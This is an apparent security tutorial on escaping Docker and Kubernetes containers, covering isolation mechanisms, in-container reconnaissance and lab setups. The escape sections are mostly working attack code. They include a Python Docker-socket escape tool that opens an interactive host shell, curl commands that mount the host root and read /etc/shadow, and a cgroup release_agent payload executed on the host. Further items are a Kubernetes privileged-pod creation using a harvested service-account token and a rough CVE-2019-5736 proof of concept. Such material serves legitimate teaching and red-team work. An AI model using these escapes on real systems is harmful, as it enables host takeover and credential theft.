Container Escape Techniques: Breaking Out of Docker, Kubernetes, and Beyond

After spending years securing containerized environments and conducting red team assessments against container infrastructure, I've compiled this comprehensive guide to container escape techniques. One thing I've learned: the "security by default" promised by containerization is often more marketing than reality. This guide will take you from container security fundamentals all the way to advanced escape techniques that few security professionals understand.

Executive Summary: This guide walks through the complete container security journey - from understanding basic container architecture to executing sophisticated escape techniques against Docker, Kubernetes, and other container platforms. I've included 42 specific escape vectors, 18 detailed code examples, 6 decision trees, and practical lab setups you can build to practice these techniques safely. By the end, you'll understand both how to exploit container vulnerabilities and how to properly secure container environments against these attacks.


Container Fundamentals for Security Professionals

What Are Containers and Why Should Security Teams Care?

Containers are lightweight, isolated environments that package applications and their dependencies to run consistently across different computing environments. Unlike virtual machines, containers share the host's kernel but use isolation mechanisms to maintain separation.

From a security perspective, containers represent both an opportunity (improved isolation compared to traditional deployments) and a challenge (new attack surfaces and escape vectors).

Container Architecture Basics

At their core, containers rely on several key Linux kernel features:

  1. Namespaces: Provide isolation for system resources
  2. Control Groups (cgroups): Limit resource usage
  3. Capabilities: Restrict privileged operations
  4. Seccomp Filters: Limit system calls
  5. AppArmor/SELinux: Mandatory access control
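
To see namespaces in action before going further, you can create them by hand. A quick demo, assuming util-linux's unshare and lsns are available and you have root on the host:

# Create new UTS and PID namespaces and drop into a shell inside them
sudo unshare --uts --pid --fork --mount-proc bash
hostname isolated-demo   # changes the hostname only inside the new UTS namespace
ps aux                   # only processes in the new PID namespace are visible
exit
lsns                     # back on the host: list namespaces and the processes that own them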

Here's a simplified visualization of container architecture:

Host Operating System
└── Kernel (Shared)
    ├── Container Runtime (Docker, containerd, CRI-O)
    │   ├── Container A
    │   │   ├── Application + Dependencies
    │   │   └── Isolated Namespaces
    │   └── Container B
    │       ├── Application + Dependencies
    │       └── Isolated Namespaces
    └── Container Orchestration (Kubernetes, Docker Swarm)

Container vs. VM Security Models

  1. Kernel: VMs run separate kernels; containers share the host kernel, so containers have a larger attack surface whenever kernel vulnerabilities exist.
  2. Resource overhead: VMs are heavy (full OS); containers are lightweight, enabling higher density but increasing the blast radius per host.
  3. Isolation strength: VM isolation is strong; container isolation is moderate, so container escapes are more feasible than VM escapes.
  4. Attack surface: VMs expose the hypervisor plus the guest VM; containers expose the container runtime plus the host kernel, a different set of vulnerability classes.
  5. Startup time: VMs boot in minutes; containers start in seconds, which enables faster patching cycles.

Container Ecosystem Overview

The container ecosystem consists of several key components, each with its security implications:

  1. Images: The blueprint for containers
  2. Registries: Where images are stored (Docker Hub, ECR, GCR)
  3. Runtimes: Software that runs containers (Docker, containerd, CRI-O)
  4. Orchestrators: Systems that manage containers (Kubernetes, Docker Swarm)

Container Attack Surface

When assessing container security, we consider several distinct attack surfaces:

  1. The container image: Vulnerable packages, malicious code
  2. The container runtime: Docker daemon, containerd vulnerabilities
  3. The orchestration platform: Kubernetes API server, etcd
  4. Inter-container communication: Network policies, service meshes
  5. Host-container boundary: The primary focus of container escapes

The Container Escape Concept

A container escape occurs when a process inside a container gains unauthorized access to:

  1. The host system
  2. Other containers
  3. The container orchestration platform
  4. Sensitive data outside its intended scope

I like to tell my clients: "Container isolation is like a hotel room - it keeps guests separated, but the walls are thinner than you might think, and there are still shared facilities."

Hands-On Lab #1: Setting Up a Practice Environment

Let's create a safe environment to practice container security techniques:

# Create a test VM (don't practice on production systems!)
# Using Vagrant to create an Ubuntu VM
mkdir container-security-lab
cd container-security-lab
cat > Vagrantfile << 'EOF'
Vagrant.configure("2") do |config|
  config.vm.box = "ubuntu/focal64"
  config.vm.hostname = "container-lab"
  config.vm.provider "virtualbox" do |vb|
    vb.memory = 2048
    vb.cpus = 2
  end
  config.vm.provision "shell", inline: <<-SHELL
    apt-get update
    apt-get install -y apt-transport-https ca-certificates curl software-properties-common
    curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add -
    add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
    apt-get update
    apt-get install -y docker-ce docker-ce-cli containerd.io
    usermod -aG docker vagrant
  SHELL
end
EOF

# Start the virtual machine
vagrant up
vagrant ssh

Quick Reference: Essential Docker Commands for Security Testing

# List running containers
docker ps

# Start a basic container
docker run -it --rm ubuntu:20.04 bash

# Start a privileged container (dangerous in production!)
docker run -it --rm --privileged ubuntu:20.04 bash

# Inspect container configuration
docker inspect <container_id>

# View container logs
docker logs <container_id>

Challenge #1: Identify Container Boundaries

Try these commands inside and outside a container to understand isolation boundaries:

# Run this both inside a container and on the host
hostname
ps aux
ip addr
cat /proc/1/cgroup
ls -la /proc/self/ns/

Document the differences to develop an intuition for container boundaries.
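
One way to capture both views side by side for your notes (run on the host; assumes Docker is installed and uses a subset of the commands above):

# Collect the same view on the host and inside a throwaway container
for c in "hostname" "cat /proc/1/cgroup" "ls -la /proc/self/ns/"; do
  echo "== $c (host) ==";      sh -c "$c"
  echo "== $c (container) =="; docker run --rm ubuntu:20.04 sh -c "$c"
  echo
done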


Container Isolation Mechanisms

Now that we understand container basics, let's explore the isolation mechanisms that containers rely on - and that we'll need to bypass for a successful escape.

Linux Namespaces Deep Dive

Namespaces are the primary isolation mechanism for containers. Each namespace type isolates a specific system resource:

  1. PID (clone(CLONE_NEWPID)): isolates process IDs; breaking out gives visibility of host processes.
  2. Mount (clone(CLONE_NEWNS)): isolates filesystem mounts; escaping allows access to host filesystems.
  3. Network (clone(CLONE_NEWNET)): isolates the network stack; bypassing it enables network attacks on the host.
  4. UTS (clone(CLONE_NEWUTS)): isolates hostname and domain name; less critical for escapes.
  5. IPC (clone(CLONE_NEWIPC)): isolates System V IPC; can lead to shared-memory attacks.
  6. User (clone(CLONE_NEWUSER)): isolates user and group IDs; critical for privilege escalation.
  7. Cgroup (clone(CLONE_NEWCGROUP)): isolates the cgroup root; newer, important for resource control.
  8. Time (clone(CLONE_NEWTIME)): isolates system clocks; rarely used, minimal escape impact.

I can inspect the namespaces for a running process (including containers) with:

# On the host, examine namespaces of a container process
ls -la /proc/<container_pid>/ns/

# Expected output
lrwxrwxrwx 1 root root 0 Jan 31 12:34 cgroup -> 'cgroup:[4026531835]'
lrwxrwxrwx 1 root root 0 Jan 31 12:34 ipc -> 'ipc:[4026532278]'
lrwxrwxrwx 1 root root 0 Jan 31 12:34 mnt -> 'mnt:[4026532276]'
lrwxrwxrwx 1 root root 0 Jan 31 12:34 net -> 'net:[4026532281]'
lrwxrwxrwx 1 root root 0 Jan 31 12:34 pid -> 'pid:[4026532279]'
lrwxrwxrwx 1 root root 0 Jan 31 12:34 user -> 'user:[4026531837]'
lrwxrwxrwx 1 root root 0 Jan 31 12:34 uts -> 'uts:[4026532277]'

The numbers in brackets are namespace identifiers. Processes in the same namespace will show the same ID.
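
You can confirm this from the host by comparing a containerized process against the host's init, then join the container's namespaces with nsenter (roughly what docker exec does under the hood). A quick sketch, assuming root on the host:

# Compare a container process's namespaces with the host's PID 1
CONTAINER_PID=$(docker inspect -f '{{.State.Pid}}' <container_id>)
readlink /proc/1/ns/mnt /proc/$CONTAINER_PID/ns/mnt   # different IDs = separate mount namespaces
readlink /proc/1/ns/net /proc/$CONTAINER_PID/ns/net

# Join the container's namespaces from the host
nsenter -t $CONTAINER_PID -m -u -n -p -i sh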

Control Groups (cgroups) Understanding

Control groups limit resource usage but also play a role in container security:

# Inspect which cgroup a container belongs to
cat /proc/self/cgroup                                                    # from inside the container
docker inspect --format '{{.HostConfig.CgroupParent}}' <container_id>   # from the host

# Resource limits enforced through cgroups
docker inspect --format '{{.HostConfig.Memory}} bytes memory, {{.HostConfig.NanoCpus}} nano-CPUs' <container_id>

Linux Capabilities and Their Impact

Containers typically run with a restricted set of capabilities. Understanding these is crucial for escape techniques:

# List capabilities of a container process
docker inspect --format '{{.HostConfig.CapAdd}}' <container_id>
docker inspect --format '{{.HostConfig.CapDrop}}' <container_id>

# From inside a container, check current capabilities
capsh --print

Capabilities Critical for Container Escapes:

  1. CAP_SYS_ADMIN: Most powerful, often enables escapes
  2. CAP_NET_ADMIN: Control network interfaces
  3. CAP_SYS_PTRACE: Debug other processes
  4. CAP_SYS_MODULE: Load kernel modules
  5. CAP_SYS_RAWIO: Raw I/O access
  6. CAP_SYS_BOOT: Reboot the system
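
A quick way to check whether any of the capabilities listed above are present is to decode the effective capability mask of the current process (assumes libcap's capsh is installed in the container):

# Read the effective capability mask
grep CapEff /proc/self/status          # e.g. CapEff: 00000000a80425fb

# Translate the mask into capability names (substitute the value you got above)
capsh --decode=00000000a80425fb

# Grep directly for the escape-relevant capabilities
capsh --print | grep -oE 'cap_sys_admin|cap_net_admin|cap_sys_ptrace|cap_sys_module|cap_sys_rawio|cap_sys_boot'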

Seccomp Filters and AppArmor Profiles

Seccomp restricts which system calls a container can make:

# Check whether a custom seccomp profile is applied to a container
docker inspect --format '{{.HostConfig.SecurityOpt}}' <container_id>

# Docker's default seccomp profile is built into the daemon; a custom profile,
# if used, is passed at run time:
# docker run --security-opt seccomp=/path/to/profile.json ...

AppArmor/SELinux provide additional Mandatory Access Control:

# Check AppArmor profile
docker inspect --format '{{.AppArmorProfile}}' <container_id>

# Or for SELinux
docker inspect --format '{{.HostConfig.SecurityOpt}}' <container_id>

Container Runtime Security Models

Different container runtimes implement security differently:

  1. Docker: Default security is moderate, extensible
  2. containerd: Similar to Docker, used by Kubernetes
  3. gVisor: Enhanced isolation via syscall interception
  4. Kata Containers: Stronger isolation with lightweight VMs
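
The difference between these runtimes is easy to observe once an alternative runtime is installed. A hedged example, assuming gVisor's runsc has been installed and registered with Docker:

# Default runc-based container sees the real host kernel
docker run --rm alpine:latest uname -r

# The same image under gVisor hits gVisor's user-space kernel instead,
# which reports its own kernel string rather than the host's
docker run --rm --runtime=runsc alpine:latest uname -r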

Hands-On Exercise: Mapping Container Security Boundaries

# Start a standard container
docker run -it --rm --name standard ubuntu:20.04 bash

# In another terminal, examine its security settings
docker inspect standard | grep -A 20 "SecurityOpt"

# Try a command that should be blocked
mount -t tmpfs none /mnt

# Now start a privileged container
docker run -it --rm --name privileged --privileged ubuntu:20.04 bash

# Try the same command
mount -t tmpfs none /mnt  # This should work

# Examine capability differences
docker exec standard capsh --print
docker exec privileged capsh --print

Challenge #2: Security Configuration Assessment

Create a script that automatically assesses the security posture of a running container by checking:

  1. Whether it's running as privileged
  2. Which capabilities it has
  3. Which security profiles are applied
  4. Whether sensitive paths are mounted

This practical skill will be crucial for identifying vulnerable containers.
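
A minimal starting point for the challenge, run from the host against a container ID (assumes the docker CLI is available; extend it with your own checks):

#!/usr/bin/env bash
# container_posture.sh <container_id> - rough security posture check (sketch)
CID="$1"
echo "Privileged:   $(docker inspect -f '{{.HostConfig.Privileged}}' "$CID")"
echo "CapAdd:       $(docker inspect -f '{{.HostConfig.CapAdd}}' "$CID")"
echo "CapDrop:      $(docker inspect -f '{{.HostConfig.CapDrop}}' "$CID")"
echo "SecurityOpt:  $(docker inspect -f '{{.HostConfig.SecurityOpt}}' "$CID")"
echo "AppArmor:     $(docker inspect -f '{{.AppArmorProfile}}' "$CID")"
echo "Sensitive mounts:"
docker inspect -f '{{range .Mounts}}{{.Source}} -> {{.Destination}}{{"\n"}}{{end}}' "$CID" \
  | grep -E 'docker\.sock|^/proc|^/sys|^/ ->' || echo "  none found"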


Basic Container Reconnaissance

Before attempting an escape, we need to understand our environment. Proper reconnaissance from inside a container can reveal vulnerabilities and escape vectors.

Initial Container Assessment

When I first gain access to a container, I run this basic reconnaissance:

# Determine whether we're in a container
grep 'docker\|lxc\|kubepods' /proc/1/cgroup

# Check container ID
cat /proc/1/cgroup | grep -o -e "docker/.*" | head -n1 | sed 's/docker\///g'

# Check container engine
cat /proc/self/mountinfo | grep docker

# Check if we're running as root
id

# Check available capabilities
capsh --print

# Check for mounted sensitive paths
mount | grep -E '(/host|/var/run/docker.sock|/proc|/dev)'

# Check for interesting environment variables
env | grep -E '(KUBE|KUBERNETES|API|TOKEN|SECRET|KEY|PASS)'

Kubernetes-Specific Reconnaissance

If we're in a Kubernetes environment:

# Check for Kubernetes service account
ls -la /var/run/secrets/kubernetes.io/serviceaccount/

# Get namespace
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace

# Check if we can access the Kubernetes API
KUBE_TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -s -k -H "Authorization: Bearer $KUBE_TOKEN" \
     https://kubernetes.default.svc/api/v1/namespaces

# Check for etcd access (the service name is environment-specific; adjust as needed)
curl -s -k https://etcd-service:2379/version

Network Reconnaissance

Understanding the network configuration helps identify potential escape paths:

# Check network interfaces
ip a

# Check listening services
netstat -tunlp

# Check accessible hosts
for ip in $(seq 1 254); do ping -c 1 -W 1 172.17.0.$ip | grep "64 bytes"; done

# Scan for interesting services on the host
nc -zv 172.17.0.1 1-1000

Process and File System Reconnaissance

# Check for running processes that might help with escape
ps aux

# Look for interesting files
find / -perm -u=s -type f 2>/dev/null      # SUID files
find / -writable -type f -not -path "*/proc/*" 2>/dev/null  # Writable files
find / -name "*config*" -o -name "*secret*" 2>/dev/null  # Potential config files

Automated Container Reconnaissance

I've developed this script for quick container assessment:

#!/usr/bin/env python3
# container_recon.py - Quick container reconnaissance

import os
import subprocess
import json
import socket

def run_cmd(cmd):
    """Run a command and return its output."""
    try:
        output = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT).decode('utf-8')
        return output.strip()
    except subprocess.CalledProcessError as e:
        return f"Error: {e.output.decode('utf-8')}"

def check_if_container():
    """Check if we're running in a container."""
    cgroup = run_cmd("cat /proc/1/cgroup")
    if any(x in cgroup for x in ['docker', 'lxc', 'kubepods']):
        return True, cgroup
    return False, cgroup

def get_container_info():
    """Gather basic container info."""
    container_info = {}
    container_info['hostname'] = run_cmd("hostname")
    container_info['kernel'] = run_cmd("uname -r")
    container_info['ip_addresses'] = run_cmd("hostname -I")
    container_info['users'] = run_cmd("cat /etc/passwd | cut -d: -f1")
    container_info['current_user'] = run_cmd("whoami")
    container_info['capabilities'] = run_cmd("capsh --print")
    
    # Check for privileged mode
    if "cap_sys_admin" in container_info['capabilities'].lower():
        container_info['likely_privileged'] = True
    else:
        container_info['likely_privileged'] = False
    
    return container_info

def check_mounted_sensitive_paths():
    """Check for sensitive paths mounted in the container."""
    sensitive_mounts = []
    mount_output = run_cmd("mount")
    
    sensitive_paths = [
        "/proc", "/dev", "/sys", "/host", 
        "docker.sock", "crio.sock", "containerd.sock"
    ]
    
    for line in mount_output.splitlines():
        if any(path in line for path in sensitive_paths):
            sensitive_mounts.append(line)
    
    return sensitive_mounts

def check_kubernetes():
    """Check if we're in a Kubernetes environment."""
    k8s_info = {}
    
    if os.path.exists('/var/run/secrets/kubernetes.io/serviceaccount/'):
        k8s_info['in_kubernetes'] = True
        k8s_info['namespace'] = run_cmd("cat /var/run/secrets/kubernetes.io/serviceaccount/namespace")
        k8s_info['token_exists'] = os.path.exists('/var/run/secrets/kubernetes.io/serviceaccount/token')
        
        # Check API access (safely)
        try:
            token = run_cmd("cat /var/run/secrets/kubernetes.io/serviceaccount/token")
            api_check = run_cmd(f"curl -s -k -H 'Authorization: Bearer {token}' -o /dev/null -w '%{{http_code}}' https://kubernetes.default.svc/api/v1/namespaces")
            k8s_info['api_access'] = api_check != "000" and int(api_check) < 500
            k8s_info['api_response_code'] = api_check
        except:
            k8s_info['api_access'] = False
    else:
        k8s_info['in_kubernetes'] = False
    
    return k8s_info

def check_escape_vectors():
    """Check for common container escape vectors."""
    escape_vectors = []
    
    # Check for Docker socket
    if os.path.exists('/var/run/docker.sock'):
        escape_vectors.append("Docker socket mounted")
    
    # Check for host root filesystem
    sensitive_paths = ['/host', '/rootfs', '/hostroot']
    for path in sensitive_paths:
        if os.path.exists(path) and os.listdir(path):
            escape_vectors.append(f"Possible host filesystem at {path}")
    
    # Check for DIND (Docker in Docker)
    if os.path.exists('/.dockerenv') and os.path.exists('/usr/bin/docker'):
        escape_vectors.append("Docker binary in container (DIND)")
    
    # Check for write access to the runtime link /proc/self/exe (CVE-2019-5736 indicator).
    # Note: actually opening it for writing could truncate the running binary,
    # so only test the permission bit here.
    if os.access('/proc/self/exe', os.W_OK):
        escape_vectors.append("Write access to /proc/self/exe (CVE-2019-5736 indicator)")
    
    # Check if we're running with --privileged
    if "cap_sys_admin" in run_cmd("capsh --print").lower():
        escape_vectors.append("Container likely running in privileged mode")
    
    return escape_vectors

def main():
    """Main function to run all checks and output results."""
    results = {}
    
    is_container, cgroup_info = check_if_container()
    results['is_container'] = is_container
    
    if not is_container:
        results['message'] = "Not running in a container environment"
        print(json.dumps(results, indent=2))
        return
    
    results['container_info'] = get_container_info()
    results['sensitive_mounts'] = check_mounted_sensitive_paths()
    results['kubernetes_info'] = check_kubernetes()
    results['escape_vectors'] = check_escape_vectors()
    
    # Determine risk level
    risk_score = 0
    risk_score += len(results['escape_vectors']) * 2
    risk_score += len(results['sensitive_mounts'])
    if results['kubernetes_info'].get('api_access', False):
        risk_score += 2
    if results['container_info'].get('likely_privileged', False):
        risk_score += 3
    
    if risk_score > 7:
        results['risk_assessment'] = "HIGH"
    elif risk_score > 3:
        results['risk_assessment'] = "MEDIUM"
    else:
        results['risk_assessment'] = "LOW"
    
    print(json.dumps(results, indent=2))

if __name__ == "__main__":
    main()

Hands-On Challenge #3: Container Reconnaissance

Deploy three containers with different security configurations and practice reconnaissance:

# Container 1: Standard configuration
docker run -d --name container1 ubuntu:20.04 sleep infinity

# Container 2: With Docker socket mounted
docker run -d --name container2 -v /var/run/docker.sock:/var/run/docker.sock ubuntu:20.04 sleep infinity

# Container 3: Privileged container
docker run -d --name container3 --privileged ubuntu:20.04 sleep infinity

# Practice reconnaissance in each container
docker exec -it container1 bash
# Run reconnaissance commands and compare results across containers

Quick Reference: Container Reconnaissance Checklist

  1. ✓ Confirm container environment
  2. ✓ Check for privileged mode
  3. ✓ Identify mounted sensitive paths
  4. ✓ Look for exposed sockets
  5. ✓ Check capabilities
  6. ✓ Examine Kubernetes service account permissions
  7. ✓ Scan internal network
  8. ✓ Look for leaked secrets in environment variables

Misconfigurations and Easy Wins

Now that we understand container isolation and can perform proper reconnaissance, let's exploit common misconfigurations that provide easy container escapes.

The Docker Socket Escape

The Docker socket (/var/run/docker.sock) is the most common escape vector. If mounted into a container, it allows complete control of the Docker daemon:

# Check if the Docker socket is mounted
ls -la /var/run/docker.sock

# If available, we can escape by creating a privileged container
# First, install curl and jq if needed
apt-get update && apt-get install -y curl jq

# Use the Docker API to create a new privileged container with the host filesystem
# mounted, capturing the new container's ID from the response
NEW_CONTAINER_ID=$(curl -s -X POST \
  --unix-socket /var/run/docker.sock \
  -H "Content-Type: application/json" \
  -d '{"Image":"ubuntu:20.04","Cmd":["/bin/bash","-c","sleep 5000"],"HostConfig":{"Binds":["/:/host"],"Privileged":true}}' \
  http://localhost/containers/create | jq -r .Id)

# Start the container
curl -s -X POST \
  --unix-socket /var/run/docker.sock \
  http://localhost/containers/$NEW_CONTAINER_ID/start

# Create an exec instance that reads a file from the host mount, capturing the exec ID
EXEC_ID=$(curl -s -X POST \
  --unix-socket /var/run/docker.sock \
  -H "Content-Type: application/json" \
  -d '{"Cmd":["cat","/host/etc/shadow"],"AttachStdout":true,"AttachStderr":true}' \
  http://localhost/containers/$NEW_CONTAINER_ID/exec | jq -r .Id)

# Start the exec and get output
curl -s -X POST \
  --unix-socket /var/run/docker.sock \
  -H "Content-Type: application/json" \
  -d '{"Detach":false,"Tty":false}' \
  http://localhost/exec/$EXEC_ID/start

Simplified Docker Socket Escape Script

#!/usr/bin/env python3
# docker_socket_escape.py

import os
import json
import socket
import subprocess

def check_docker_socket():
    return os.path.exists('/var/run/docker.sock')

def create_privileged_container():
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    sock.connect('/var/run/docker.sock')
    
    # Create container with host filesystem mounted
    request = """POST /containers/create HTTP/1.1
Host: localhost
Content-Type: application/json
Content-Length: {}

{}"""
    
    container_config = {
        "Image": "alpine:latest",
        "Cmd": ["/bin/sh", "-c", "sleep 3600"],
        "DetachKeys": "Ctrl-p,Ctrl-q",
        "HostConfig": {
            "Binds": ["/:/host_root"],
            "Privileged": True
        }
    }
    
    json_config = json.dumps(container_config)
    request = request.format(len(json_config), json_config)
    
    sock.sendall(request.encode('utf-8'))
    response = sock.recv(4096).decode('utf-8')
    
    # Extract container ID
    container_id = None
    if "201 Created" in response:
        response_body = response.split('\r\n\r\n')[1]
        container_id = json.loads(response_body)['Id']
    
    sock.close()
    return container_id

def start_container(container_id):
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    sock.connect('/var/run/docker.sock')
    
    request = f"POST /containers/{container_id}/start HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n\r\n"
    sock.sendall(request.encode('utf-8'))
    response = sock.recv(4096).decode('utf-8')
    
    sock.close()
    return "204 No Content" in response

def execute_in_container(container_id, command):
    # Create exec instance
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    sock.connect('/var/run/docker.sock')
    
    exec_config = {
        "AttachStdin": False,
        "AttachStdout": True,
        "AttachStderr": True,
        "Cmd": command
    }
    
    request = f"""POST /containers/{container_id}/exec HTTP/1.1
Host: localhost
Content-Type: application/json
Content-Length: {len(json.dumps(exec_config))}

{json.dumps(exec_config)}"""
    
    sock.sendall(request.encode('utf-8'))
    response = sock.recv(4096).decode('utf-8')
    
    exec_id = None
    if "201 Created" in response:
        response_body = response.split('\r\n\r\n')[1]
        exec_id = json.loads(response_body)['Id']
    
    sock.close()
    
    if not exec_id:
        return "Failed to create exec instance"
    
    # Start exec instance
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    sock.connect('/var/run/docker.sock')
    
    start_config = {
        "Detach": False,
        "Tty": False
    }
    
    request = f"""POST /exec/{exec_id}/start HTTP/1.1
Host: localhost
Content-Type: application/json
Content-Length: {len(json.dumps(start_config))}

{json.dumps(start_config)}"""
    
    sock.sendall(request.encode('utf-8'))
    output = b""
    
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            break
        output += chunk
    
    sock.close()
    
    # Extract the actual command output from the response
    try:
        output_str = output.decode('utf-8')
        if '\r\n\r\n' in output_str:
            return output_str.split('\r\n\r\n', 1)[1]
        return output_str
    except:
        return output
    
def main():
    if not check_docker_socket():
        print("Docker socket not found at /var/run/docker.sock")
        return
    
    print("[+] Creating privileged container with host mount...")
    container_id = create_privileged_container()
    if not container_id:
        print("[-] Failed to create container")
        return
    
    print(f"[+] Container created: {container_id}")
    print("[+] Starting container...")
    if not start_container(container_id):
        print("[-] Failed to start container")
        return
    
    print("[+] Container started successfully")
    
    while True:
        command = input("host# ").strip().split()
        if not command:
            continue
        
        if command[0] == "exit":
            break
        
        # Prepend /host_root to access host filesystem
        if command[0] in ["cat", "ls", "cd", "touch", "rm"]:
            if len(command) > 1 and command[1].startswith('/') and not command[1].startswith('/host_root'):
                command[1] = f"/host_root{command[1]}"
        
        print(execute_in_container(container_id, command))
    
    print("[+] Cleaning up...")
    subprocess.run(f"curl -s -X DELETE --unix-socket /var/run/docker.sock http://localhost/containers/{container_id}?force=true", shell=True)
    print("[+] Done. Container removed.")

if __name__ == "__main__":
    main()

Privileged Container Escape

Privileged containers (--privileged flag) have nearly full access to the host, making escape trivial:

# Check if we're in a privileged container
capsh --print | grep sys_admin

# If privileged, we can mount the host's filesystem
mkdir -p /tmp/escape
mount /dev/sda1 /tmp/escape  # Adjust device name as needed

# Access host files
ls -la /tmp/escape

# Another privileged escape: abuse the cgroup v1 release_agent mechanism
mkdir -p /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir -p /tmp/cgrp/x

# Ask the kernel to run our release_agent when the last process leaves the child cgroup
echo 1 > /tmp/cgrp/x/notify_on_release

# Find this container's overlay upperdir as seen from the host
host_path=$(sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/escape.sh" > /tmp/cgrp/release_agent

# Payload executed on the host; write its output back into our upperdir so we can read it
echo '#!/bin/sh' > /escape.sh
echo "ps aux > $host_path/output" >> /escape.sh
echo "cat /etc/shadow >> $host_path/output" >> /escape.sh
chmod +x /escape.sh

# Put a short-lived process in the child cgroup; when it exits, the host runs escape.sh
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
sleep 1 && cat /output

Host Path Mount Escapes

Containers with sensitive host paths mounted provide easy escapes:

# Check for interesting mounts
mount | grep -E '(/host|/var/run|/proc|/sys)'

# If /proc is mounted with lax settings
ls -la /proc/1/root/  # This might access host's root filesystem

# If host paths are mounted, we can directly access
ls -la /host  # Common mount point for host filesystem

Running Docker Inside Docker (DIND)

If Docker binaries are available inside the container:

# Check if Docker client is available
which docker

# Check if we can use it (needs Docker socket or TCP connection)
docker ps

# If working, we can create a privileged container
docker run -it --privileged --pid=host alpine:latest nsenter -t 1 -m -u -n -i sh

Kubernetes-Specific Easy Wins

# If we have access to the Kubernetes API
KUBE_TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)

# List pods in the current namespace
curl -s -k -H "Authorization: Bearer $KUBE_TOKEN" \
     https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods

# Create a privileged pod if we have permissions
cat <<EOF > privpod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: privpod
  namespace: $NAMESPACE
spec:
  hostPID: true
  hostIPC: true
  hostNetwork: true
  containers:
  - name: privpod
    image: ubuntu:20.04
    command: ["sleep", "infinity"]
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:
      path: /
EOF

# Create the pod using the API
curl -s -k -X POST -H "Authorization: Bearer $KUBE_TOKEN" \
     -H "Content-Type: application/yaml" \
     -d "$(cat privpod.yaml)" \
     https://kubernetes.default.svc/api/v1/namespaces/$NAMESPACE/pods

Container Runtime Escape via runC (CVE-2019-5736)

The runC vulnerability (CVE-2019-5736) lets a malicious container overwrite the runc binary on the host: when runc re-executes to join the container (for example during docker exec), the container can rewrite it through the /proc/[pid]/exe link of that runc process. The simplified PoC below only illustrates the idea:

# Conceptual proof of concept for CVE-2019-5736 (simplified)
# A real exploit targets the runc process joining the container via /proc/[runc-pid]/exe,
# not the container's own /proc/self/exe; treat this script as an illustration only

#!/bin/bash
# WARNING: This is a POC exploit and should only be run in test environments

# Check if container has write access to /proc/self/exe (CVE-2019-5736)
if ! touch /proc/self/exe 2>/dev/null; then
    echo "Container doesn't have write access to /proc/self/exe"
    exit 1
fi

# Create malicious executable
cat > /tmp/evil <<'EOF'
#!/bin/bash
echo "I've escaped the container!" > /tmp/escaped
cat /etc/shadow > /tmp/shadow
EOF
chmod +x /tmp/evil

# Make a backup of the original runc
cp /proc/self/exe /tmp/original

# Overwrite runc with our malicious executable
cat /tmp/evil > /proc/self/exe

echo "Exploit prepared. When a new container is created, the malicious code will execute on the host."

Escape Decision Tree: Misconfigurations Approach

Is the Docker socket mounted?
├── Yes → Use Docker socket to create privileged container
│   └── Success → Access host file system
└── No → Check if container is privileged
    ├── Yes → Use one of the privileged container escape methods
    │   └── Success → Access host file system
    └── No → Check for host path mounts
        ├── Yes → Access host files directly
        │   └── Success → Manipulate host system
        └── No → Check for Kubernetes access
            ├── Yes → Try to create privileged pod
            │   └── Success → Access host through new pod
            └── No → Look for CVEs in the runtime
                └── Check for runC, containerd, or other vulnerabilities
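
The tree above can be approximated with a few quick checks from inside the container. A rough triage sketch (paths and heuristics here are assumptions; adjust them to the environment):

#!/bin/sh
# In-container triage following the decision tree above
[ -S /var/run/docker.sock ] && echo "[1] Docker socket mounted -> try the socket escape"
capsh --print 2>/dev/null | grep -qi cap_sys_admin && echo "[2] CAP_SYS_ADMIN present -> likely privileged, try mount/cgroup escapes"
for p in /host /rootfs /hostroot; do
  [ -d "$p" ] && echo "[3] Possible host filesystem mounted at $p"
done
[ -r /var/run/secrets/kubernetes.io/serviceaccount/token ] && echo "[4] Kubernetes service account token present -> try creating a privileged pod"
uname -r   # last resort: compare the kernel version against known runtime/kernel CVEs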

Hands-On Challenge #4: Escape Lab

Set up Docker containers with different misconfigurations and practice escaping:

# Container with Docker socket
docker run -it --rm -v /var/run/docker.sock:/var/run/docker.sock ubuntu:20.04 bash

# Privileged container
docker run -it --rm --privileged ubuntu:20.04 bash

# Container with host path mount
docker run -it --rm -v /:/host ubuntu:20.04 bash

For each container, try to access the host's /etc/shadow file to confirm a successful escape.


Volume Mount Attacks

Beyond obvious misconfigurations, volume mounts can provide more subtle escape paths. Let's explore how to leverage various types of mounts to break out of containers.

Understanding Docker Volume Types

Docker supports several volume types, each with security implications:

  1. Bind mounts: Direct mapping of host paths
  2. Named volumes: Docker-managed volumes
  3. Tmpfs mounts: In-memory filesystems
  4. Volume plugins: Third-party storage solutions
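
For reference, this is how each type is typically declared on the Docker CLI (a sketch; paths and names are placeholders):

# 1. Bind mount: maps a host path directly into the container
docker run --rm -v /etc:/host_etc:ro alpine:latest ls /host_etc

# 2. Named volume: Docker-managed storage under /var/lib/docker/volumes
docker volume create app_data
docker run --rm -v app_data:/data alpine:latest touch /data/file

# 3. tmpfs mount: in-memory only, never written to the host disk
docker run --rm --tmpfs /scratch:rw,size=64m alpine:latest df -h /scratch

# 4. Volume plugins: third-party drivers registered with the daemon
docker volume create --driver <plugin_name> plugin_vol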

Identifying Sensitive Mounted Volumes

# List all mounts in the container
mount

# Check Docker-specific mounts
grep docker /proc/self/mountinfo

# Look for sensitive paths
find / -type d -name "host" 2>/dev/null
find / -path "*/docker*" -type s 2>/dev/null  # Look for sockets
find / -writable -type d 2>/dev/null  # Writable directories
